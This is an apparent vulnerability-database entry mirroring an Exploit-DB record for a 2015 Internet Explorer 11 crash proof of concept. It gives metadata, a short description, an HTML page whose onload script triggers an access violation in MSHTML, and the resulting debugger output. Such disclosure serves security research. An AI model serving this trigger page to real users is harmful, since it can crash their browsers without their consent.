Microsoft Internet Explorer 11 Crash PoC

vendor:

Internet Explorer

by:

Pawel Wylecial

7.5

CVSS

HIGH

Crash PoC

119

CWE

Product Name: Internet Explorer

Affected Version From: 11.0.9600.17801

Affected Version To: 11.0.9600.17801

Patch Exists: YES

Related CWE: N/A

CPE: a:microsoft:internet_explorer:11.0.9600.17801

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7/8.1

2015

Microsoft Internet Explorer 11 Crash PoC

This exploit is a proof of concept for a crash vulnerability in Microsoft Internet Explorer 11. The vulnerability is triggered when the outerHTML of a div element is set to 'AAAA'. This causes an access violation in MSHTML!Tree::ElementNode::GetCElement.

Mitigation:

Microsoft has released a patch for this vulnerability.

Source

Exploit-DB raw data:

<!--
# Exploit title: Microsoft Internet Explorer 11 Crash PoC
# Date: 07.06.2015
# Vulnerable version: 11 (newest at the time 11.0.9600.17801)
# Tested on: Windows 7/8.1
# Author: Pawel Wylecial
# http://howl.overflow.pl @h0wlu
-->
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
        var divA = document.createElement("div");
        document.body.appendChild(divA);

        try {
                //divA.contentEditable = "true";
                divA.outerHTML = "AAAA";
                var context = divA['msGetInputContext']();
        }
        catch (exception) {
        }
}
</script>
</head>
<body onload='boom();'>
</body>
</html>
<!--
(2534.480c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98
eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000  test    dword ptr [ecx+8],100000h ds:002b:00000008=????????
-->